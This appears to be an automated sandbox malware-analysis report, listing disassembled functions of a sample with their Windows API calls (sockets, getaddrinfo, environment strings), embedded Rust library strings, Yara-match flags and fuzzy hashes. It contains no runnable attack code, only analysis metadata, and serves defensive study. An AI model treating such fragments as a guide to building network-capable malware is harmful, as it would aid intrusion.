Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: IoctlSocketioctlsocket
String ID: Network unreachabletcp connect error$tcp open errortcp set_nonblocking errortcp bind local error
API String ID: 3182012499-2266390304
Opcode ID: 753dc986c885a2cb220be33ed8660d4414fe3b119138fd6df277b52fd54725e8
Instruction ID: 0e04bb04c2a2408239808a22815d237702f54aa85dc9ef0f43f344d6a082bd38
Opcode Fuzzy Hash: 753dc986c885a2cb220be33ed8660d4414fe3b119138fd6df277b52fd54725e8
Instruction Fuzzy Hash: E212AF22E08BC581F7219F24D4103F9A360FBA9B68F449236DE8C17696DF79E6D9C710

Function 00007FF71A8117A9 Relevance: 14.1, APIs: 11, Instructions: 357COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A81190D
memcpy.MSVCRT ref: 00007FF71A81193A
memcpy.MSVCRT ref: 00007FF71A811952
memcpy.MSVCRT ref: 00007FF71A811991
memcpy.MSVCRT ref: 00007FF71A811BC5
memcpy.MSVCRT ref: 00007FF71A811C58
memcpy.MSVCRT ref: 00007FF71A811C92
memcpy.MSVCRT ref: 00007FF71A811D0B
memcpy.MSVCRT ref: 00007FF71A811D29
memcpy.MSVCRT ref: 00007FF71A811DAF
memcpy.MSVCRT ref: 00007FF71A811EC2
memcpy.MSVCRT ref: 00007FF71A811F1D
memcpy.MSVCRT ref: 00007FF71A811F90
memcpy.MSVCRT ref: 00007FF71A811FA6
memcpy.MSVCRT ref: 00007FF71A811FC0
memcpy.MSVCRT ref: 00007FF71A812031
memcpy.MSVCRT ref: 00007FF71A81204B
memcpy.MSVCRT ref: 00007FF71A8122C0
memcpy.MSVCRT ref: 00007FF71A8122EE
memcpy.MSVCRT ref: 00007FF71A8124AC
WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF71A812690
GetLastError.KERNEL32 ref: 00007FF71A81269A
memcpy.MSVCRT ref: 00007FF71A813A15
memcpy.MSVCRT ref: 00007FF71A813A5A
memcpy.MSVCRT ref: 00007FF71A813ABC
memcpy.MSVCRT ref: 00007FF71A813B36
memcpy.MSVCRT ref: 00007FF71A813B58

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy$AddressErrorLastWait
String ID:
API String ID: 587126646-0
Opcode ID: daaa2f8078ff16a55c8cbddbfc2fdd1a0e46e2c2c9962d35e2d211557de890d6
Instruction ID: a79b70f082ec41f7ec13138c9a5f6579a04239d7eb59e547158c6d8350783838
Opcode Fuzzy Hash: daaa2f8078ff16a55c8cbddbfc2fdd1a0e46e2c2c9962d35e2d211557de890d6
Instruction Fuzzy Hash: E712BF62A0DFD585F722DB28A0047EEA768FB99748F459122DFCC13656DF38E299C700

Function 00007FF71A80EC33 Relevance: 13.1, APIs: 5, Strings: 3, Instructions: 1098COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A80ECF6
memcpy.MSVCRT ref: 00007FF71A80EE15
memcpy.MSVCRT ref: 00007FF71A80F09D
memcpy.MSVCRT ref: 00007FF71A80F993
memcpy.MSVCRT ref: 00007FF71A80FE5A

Strings

httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A80F288, 00007FF71A80F598
Pending error polled more than once, xrefs: 00007FF71A80ED3D
cookie2, xrefs: 00007FF71A80F766

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: Pending error polled more than once$cookie2$httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
API String ID: 3510742995-1253172179
Opcode ID: 1b1aa4355986ca8f353684b1188a97d66944025713159b979c018e93a15959fb
Instruction ID: 0500fd77145f1cd6e6b9737d8c16880a51fb9d2420d2be48bc43bcfe8ddb76cb
Opcode Fuzzy Hash: 1b1aa4355986ca8f353684b1188a97d66944025713159b979c018e93a15959fb
Instruction Fuzzy Hash: D9B2A521A08EC181FB62AB15E5553FAA3A1FB84BA4F804173DE8D17799CF3CE55AC710

Function 00007FF71A81186F Relevance: 12.8, APIs: 10, Instructions: 341COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A81190D
memcpy.MSVCRT ref: 00007FF71A81193A
memcpy.MSVCRT ref: 00007FF71A811952
memcpy.MSVCRT ref: 00007FF71A811991
memcpy.MSVCRT ref: 00007FF71A811BC5
memcpy.MSVCRT ref: 00007FF71A811C58
memcpy.MSVCRT ref: 00007FF71A811C92
memcpy.MSVCRT ref: 00007FF71A811D0B
memcpy.MSVCRT ref: 00007FF71A811D29
memcpy.MSVCRT ref: 00007FF71A811DAF
memcpy.MSVCRT ref: 00007FF71A811EC2
memcpy.MSVCRT ref: 00007FF71A811F1D
memcpy.MSVCRT ref: 00007FF71A811F90
memcpy.MSVCRT ref: 00007FF71A811FA6
memcpy.MSVCRT ref: 00007FF71A811FC0
memcpy.MSVCRT ref: 00007FF71A812031
memcpy.MSVCRT ref: 00007FF71A81204B
memcpy.MSVCRT ref: 00007FF71A8122C0
memcpy.MSVCRT ref: 00007FF71A8122EE
memcpy.MSVCRT ref: 00007FF71A8124AC
WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF71A812690
GetLastError.KERNEL32 ref: 00007FF71A81269A
memcpy.MSVCRT ref: 00007FF71A813A15
memcpy.MSVCRT ref: 00007FF71A813A5A
memcpy.MSVCRT ref: 00007FF71A813ABC
memcpy.MSVCRT ref: 00007FF71A813B36
memcpy.MSVCRT ref: 00007FF71A813B58

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy$AddressErrorLastWait
String ID:
API String ID: 587126646-0
Opcode ID: 6e3a7fa4a7bd322ef20675b4b542871a219165b3f1bbb83d4996749d87d22491
Instruction ID: 3335749ea742cf2e38a269f9c43ad83dbcfcb3ab37c54d9ad54faac36796c59c
Opcode Fuzzy Hash: 6e3a7fa4a7bd322ef20675b4b542871a219165b3f1bbb83d4996749d87d22491
Instruction Fuzzy Hash: DB12AE62A0DFD585F762DB28A0047EEA764FB99748F849122DF8C13756DF38E299C700

Function 00007FF71A8458B0 Relevance: 9.2, APIs: 6, Instructions: 194
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF71A84590B
getaddrinfo.WS2_32 ref: 00007FF71A8459B6
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00007FF71A8454DE), ref: 00007FF71A8459BF
memset.MSVCRT ref: 00007FF71A845A73
WSAStartup.WS2_32 ref: 00007FF71A845A7F
memset.MSVCRT ref: 00007FF71A845B13

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memset$ErrorLastStartupgetaddrinfomemcpy
String ID:
API String ID: 3791713709-0
Opcode ID: 448cb79562f571f1dfe032b0a322c0da33062a932b341f9ddd2aa9ce22c416a3
Instruction ID: 5494ad37c9b4c034d3350871d41e5d729d4ecd05b7329365c4d85b802e0ecd11
Opcode Fuzzy Hash: 448cb79562f571f1dfe032b0a322c0da33062a932b341f9ddd2aa9ce22c416a3
Instruction Fuzzy Hash: 1A71B332A08F5698FB16AF61E8403FCA760AB457A4FC48073DE5D07795EE3CA659C320

Function 00007FF71A7F097B Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF71A7F0A18
memcpy.MSVCRT ref: 00007FF71A7F0B8A
memcpy.MSVCRT ref: 00007FF71A7F0BCE

Strings

HTTP/2 connection in progressALPN upgraded to HTTP/2/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/hyper-0.14.28/src/client/client.rs, xrefs: 00007FF71A7F0A4E
internal error: entered unreachable codemid > len, xrefs: 00007FF71A7F0C2D

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: HTTP/2 connection in progressALPN upgraded to HTTP/2/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/hyper-0.14.28/src/client/client.rs$internal error: entered unreachable codemid > len
API String ID: 3510742995-2032269332
Opcode ID: fb3fa56834ef181a19cf2ae2052b1795dc664fa910a9a5653948d8e44a1cdb5a
Instruction ID: 26b2c9fe4aab291ba85aa607d56f350d3a724c39140e18cd6f3cea767866b16e
Opcode Fuzzy Hash: fb3fa56834ef181a19cf2ae2052b1795dc664fa910a9a5653948d8e44a1cdb5a
Instruction Fuzzy Hash: D0619326609F9680EA21EB11E4503E9A764F7897A0F818173DEAD03795EE38D28EC710

Function 00007FF71A7CD345 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 188
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAGetLastError.WS2_32 ref: 00007FF71A7CD40C
getsockname.WS2_32 ref: 00007FF71A7CD4DB
WSAGetLastError.WS2_32 ref: 00007FF71A7CD52C

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF71A7CD69A
assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF71A7CD682

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorLast$getsockname
String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 3066790409-3544120690
Opcode ID: 931f7c25665ca8fdeda858951bf81e5e8164233e45e3a5e9562f8f8a3ab71c3b
Instruction ID: d06c407c0baaba716e7d22398a56fc3357700b9a77585aab58314b3a8f7c42bc
Opcode Fuzzy Hash: 931f7c25665ca8fdeda858951bf81e5e8164233e45e3a5e9562f8f8a3ab71c3b
Instruction Fuzzy Hash: 8EA1402291CAC195F7259F18E0413FAF3B0EF95364F509126EBC842A56EB3DE299CB50

Function 00007FF71A7DD8E0 Relevance: 7.7, APIs: 6, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF71A7DDA99
memcpy.MSVCRT ref: 00007FF71A7DDAD5
memcpy.MSVCRT ref: 00007FF71A7DDB0C

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: bf815bb016e7edd8c4b198eff62ae9bf9d8e0234e6e74313954c3bca267dcb59
Instruction ID: 31180e3317d9ec55a0f45c1eaf591f66ae3c04bf8ad20bd8b7edc346533c2e19
Opcode Fuzzy Hash: bf815bb016e7edd8c4b198eff62ae9bf9d8e0234e6e74313954c3bca267dcb59
Instruction Fuzzy Hash: 41917122A08FC180FB51EF2194543FDA760FB99B94F844176DE8D1B68ADF68D65DC320

Function 000001912B77E554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

WSASocketA.WS2_32 ref: 000001912B77E582
WSAIoctl.WS2_32 ref: 000001912B77E5CF
closesocket.WS2_32 ref: 000001912B77E62E

Strings

_Cy, xrefs: 000001912B77E5E1

Memory Dump Source

Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd

Yara matches

Similarity

API ID: IoctlSocketclosesocket
String ID: _Cy
API String ID: 3445158922-1085951347
Opcode ID: 3b002878a253f710bfbcdeef10aed79583f0fb1cb8ac18c2645925e9684d3859
Instruction ID: 5c255282bffe8ad2f435670dd74cb676296e9681e2eba16e5d7f0255bc416a79
Opcode Fuzzy Hash: 3b002878a253f710bfbcdeef10aed79583f0fb1cb8ac18c2645925e9684d3859
Instruction Fuzzy Hash: 6D31D73065CA894FD7A8EF28C8947AAB7E5FBA9315F210A3EE44AC71D1DB34C5418741

Function 00007FF71A8214E0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF71A82155B
GetLastError.KERNEL32 ref: 00007FF71A821565

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: AddressErrorLastWait
String ID:
API String ID: 1574541344-0
Opcode ID: 8d18f15d495c35c1631006888bf8f4057b910bdb21fbbad4ec6a461566f3455c
Instruction ID: dbc8450e3de9cc0622909efbc104412bf45b878d46606a1b14974d92c37e7829
Opcode Fuzzy Hash: 8d18f15d495c35c1631006888bf8f4057b910bdb21fbbad4ec6a461566f3455c
Instruction Fuzzy Hash: CF214E36F08A1286FF27DA6598505BCA361AB41768FA48077EF1F47684CF3CD459C310

Function 00007FF71A81125F Relevance: 5.2, APIs: 4, Instructions: 214COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A81154B
memcpy.MSVCRT ref: 00007FF71A811576
memcpy.MSVCRT ref: 00007FF71A811599
memcpy.MSVCRT ref: 00007FF71A8115CE

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 9e6f2ebb7423b2d2f02bb7d28131e52a0ccc3afa1cb0e652559cd1194dc7aec8
Instruction ID: 0f6f9aba29cffcc2ab398ebb6671506d610c95c65c1bd23d273fb9c583687b26
Opcode Fuzzy Hash: 9e6f2ebb7423b2d2f02bb7d28131e52a0ccc3afa1cb0e652559cd1194dc7aec8
Instruction Fuzzy Hash: C2A18522A0CA8285F766AB14E0413FDE361FB887A4F818172DF9D57646DF3CE699C710

Function 00007FF71A7E54DF Relevance: 5.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7E54F0
memcpy.MSVCRT ref: 00007FF71A7E5518
memcpy.MSVCRT ref: 00007FF71A7E55EA
memcpy.MSVCRT ref: 00007FF71A7E5614

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: abe217286bb2f3fd9939eed656a452b639c50713e582eaf0bea777c56afe38d4
Instruction ID: 722086e85a54f09860cf0fa85f179674a2e8b3cd70d61548e338cfdf0ea4ba8a
Opcode Fuzzy Hash: abe217286bb2f3fd9939eed656a452b639c50713e582eaf0bea777c56afe38d4
Instruction Fuzzy Hash: BE61B626A0CA9185F761EF2091143BEE761EB99BA4F800073EE8D57786EE3CD65DC710

Function 00007FF71A811897 Relevance: 5.2, APIs: 4, Instructions: 157COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A81190D
memcpy.MSVCRT ref: 00007FF71A81193A
memcpy.MSVCRT ref: 00007FF71A811952
memcpy.MSVCRT ref: 00007FF71A811991
memcpy.MSVCRT ref: 00007FF71A811EC2
memcpy.MSVCRT ref: 00007FF71A811F1D
memcpy.MSVCRT ref: 00007FF71A811F90
memcpy.MSVCRT ref: 00007FF71A811FA6
memcpy.MSVCRT ref: 00007FF71A811FC0
memcpy.MSVCRT ref: 00007FF71A812031
memcpy.MSVCRT ref: 00007FF71A81204B
memcpy.MSVCRT ref: 00007FF71A8122C0
memcpy.MSVCRT ref: 00007FF71A8122EE
memcpy.MSVCRT ref: 00007FF71A8124AC
WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF71A812690
GetLastError.KERNEL32 ref: 00007FF71A81269A
memcpy.MSVCRT ref: 00007FF71A813A15
memcpy.MSVCRT ref: 00007FF71A813A5A
memcpy.MSVCRT ref: 00007FF71A813ABC
memcpy.MSVCRT ref: 00007FF71A813B36
memcpy.MSVCRT ref: 00007FF71A813B58

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy$AddressErrorLastWait
String ID:
API String ID: 587126646-0
Opcode ID: 7be297f506d7abb346f94603d76872fef7a3ebfb9eb9e20048a287e877087f11
Instruction ID: 0ba20c4945131381b7fdba448712cd20fca59a2600a9e6479e51a192370c70bb
Opcode Fuzzy Hash: 7be297f506d7abb346f94603d76872fef7a3ebfb9eb9e20048a287e877087f11
Instruction Fuzzy Hash: 6281D3A2A08FD585F762EB18D1047EDA7A8FB55758F45A122CF8C13646EF38E2D9C340

Function 00007FF71A8452D0 Relevance: 4.6, APIs: 3, Instructions: 129networkCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A84532F
getaddrinfo.WS2_32 ref: 00007FF71A84546A
WSAGetLastError.WS2_32 ref: 00007FF71A845473

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorLastgetaddrinfomemcpy
String ID:
API String ID: 1131991525-0
Opcode ID: e2313d2df0e72bc970b087ae715ca3907aef79c85d4955bcf8ae0babd702b484
Instruction ID: d44c9731d703c7345052e84e53407ad7cbfcb64f8bf84f10ecb9ebdc04b8131d
Opcode Fuzzy Hash: e2313d2df0e72bc970b087ae715ca3907aef79c85d4955bcf8ae0babd702b484
Instruction Fuzzy Hash: A251A672A48EC588F7269F71D4043FCA7A1FB557A4F844172DA5D0BB84EF7C99A8C220

Function 000001912B798C70 Relevance: 4.6, APIs: 3, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001912B791255), ref: 000001912B798C89
_malloc_crt.LIBCMT ref: 000001912B798CF0
free.LIBCMT ref: 000001912B798D28

Memory Dump Source

Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings_malloc_crtfree
String ID:
API String ID: 3979818520-0
Opcode ID: 7698a9ddcb02a270274e3175e00000504881df1837fc77bbe77ff8e25bd722fe
Instruction ID: 8551bd74f8a739971cac2780d819e8857c938c16e2d239244b5a86ef1224887d
Opcode Fuzzy Hash: 7698a9ddcb02a270274e3175e00000504881df1837fc77bbe77ff8e25bd722fe
Instruction Fuzzy Hash: AD31243055CF198FDB90EF28984526977D0FB5D740F29046EB44AC32E4DB34D88187C2

Function 000001912B77D6BC Relevance: 4.2, APIs: 3, Instructions: 411COMMON

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000001912B77D763

Part of subcall function 000001912B78EB3C: _errno.LIBCMT ref: 000001912B78EB73
Part of subcall function 000001912B78EB3C: _invalid_parameter_noinfo.LIBCMT ref: 000001912B78EB7E

_snprintf.LIBCMT ref: 000001912B77D7FA

Part of subcall function 000001912B7822B0: strchr.LIBCMT ref: 000001912B782316
Part of subcall function 000001912B7822B0: _snprintf.LIBCMT ref: 000001912B78234C

Part of subcall function 000001912B78214C: strchr.LIBCMT ref: 000001912B7821A9
Part of subcall function 000001912B78214C: _snprintf.LIBCMT ref: 000001912B7821F3

_snprintf.LIBCMT ref: 000001912B77D811

Memory Dump Source

Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd

Yara matches

Similarity

API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
String ID:
API String ID: 199363273-0
Opcode ID: ef1086764119ff5136789d9d8e2d7752195b0cca866a2fd43ceec109b41ef0b4
Instruction ID: 96af11b593e04bf3c3127ebe667511cc7e5b364fdf2a3a5e951814562c7b7e1d
Opcode Fuzzy Hash: ef1086764119ff5136789d9d8e2d7752195b0cca866a2fd43ceec109b41ef0b4
Instruction Fuzzy Hash: 2CD19570658A099FE758FF28D8957EA73E5FB99300F21052DE48AC32D1EA34DD428B81

Function 00007FF71A7A7040 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

SetThreadDescription.KERNELBASE ref: 00007FF71A7A7083

Part of subcall function 00007FF71A8214E0: WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF71A82155B
Part of subcall function 00007FF71A8214E0: GetLastError.KERNEL32 ref: 00007FF71A821565

Strings

main, xrefs: 00007FF71A7A7079

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: AddressDescriptionErrorLastThreadWait
String ID: main
API String ID: 2915094395-3207122276
Opcode ID: 6bf849e50b73a5378e67a2eecaa6d1ca066ab99e967b63fdcae7f8a52360afbb
Instruction ID: adcdfc359aefaa8546cb66005db3a7773f2684af4f64779952d1488bfad9462d
Opcode Fuzzy Hash: 6bf849e50b73a5378e67a2eecaa6d1ca066ab99e967b63fdcae7f8a52360afbb
Instruction Fuzzy Hash: DB112B25E28F4298FB02FBA0D8552F9A374AB44368FC001B3D94D466A5DF7CE12DC320

Function 00007FF71A7E421E Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 191COMMON

Download Yara Rule
